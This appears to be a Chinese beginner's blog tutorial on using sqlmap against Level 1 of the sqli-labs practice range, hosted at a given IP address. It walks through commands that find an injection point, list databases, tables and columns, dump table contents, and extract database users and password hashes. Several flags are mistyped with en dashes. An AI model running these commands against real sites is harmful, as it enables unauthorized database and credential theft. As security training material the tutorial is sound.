- 1已解决AutoGPT抛出异常:Command google returned: Error: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。_[winerror 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接
- 2二维Poisson方程五点差分格式与Python实现_用有限差分方法(五点差分格式)求解正方形域上的poisson方程边值问题
- 3DevSecOps安全工具链介绍
- 4Cisco packet tracer 软件模拟实现双核心中型企业/校园网 网络架构拓扑设计、论文,毕设_cisco网络设计模型
- 5成为java高级工程师需要什么_高级java工程师要会什么
- 6RabbitMQ之五种消息模型_rabbitmq五种消息模型
- 7视频教程下载:用ChatGPT玩转海外抖音TikTok
- 8IP地址,子网掩码,网段 概念详解_网段和ip地址的关系
- 9JVM:利用jstat查看GC信息及堆内存设置(二)
- 10上百个高质量ChatGPT Prompts 精选_stable diffusion的提示工程师
SQL注入之sqlmap入门教程_sqlmap注入
赞
踩
目录
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
一、判断是否存在注入点
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有图中白色背景的 则判断出有注入点
二、查询当前用户下所有数据库
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五个表
三、获取数据库中的表名
选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables
四、获取表中的字段名
选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns
五、获取字段内容
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump
六、获取数据库的所有用户
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用该命令就可以列出所有管理用户
七、获取数据库用户的密码
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords
八、获取当前网站数据库的名称
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db
可以看到当前的数据库是 security
九、获取当前网站数据库的用户名称
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
当前用户是root
欢迎小伙伴一键三连,后期陆续分享编程与安全的知识,一起成长,你我共勉 !
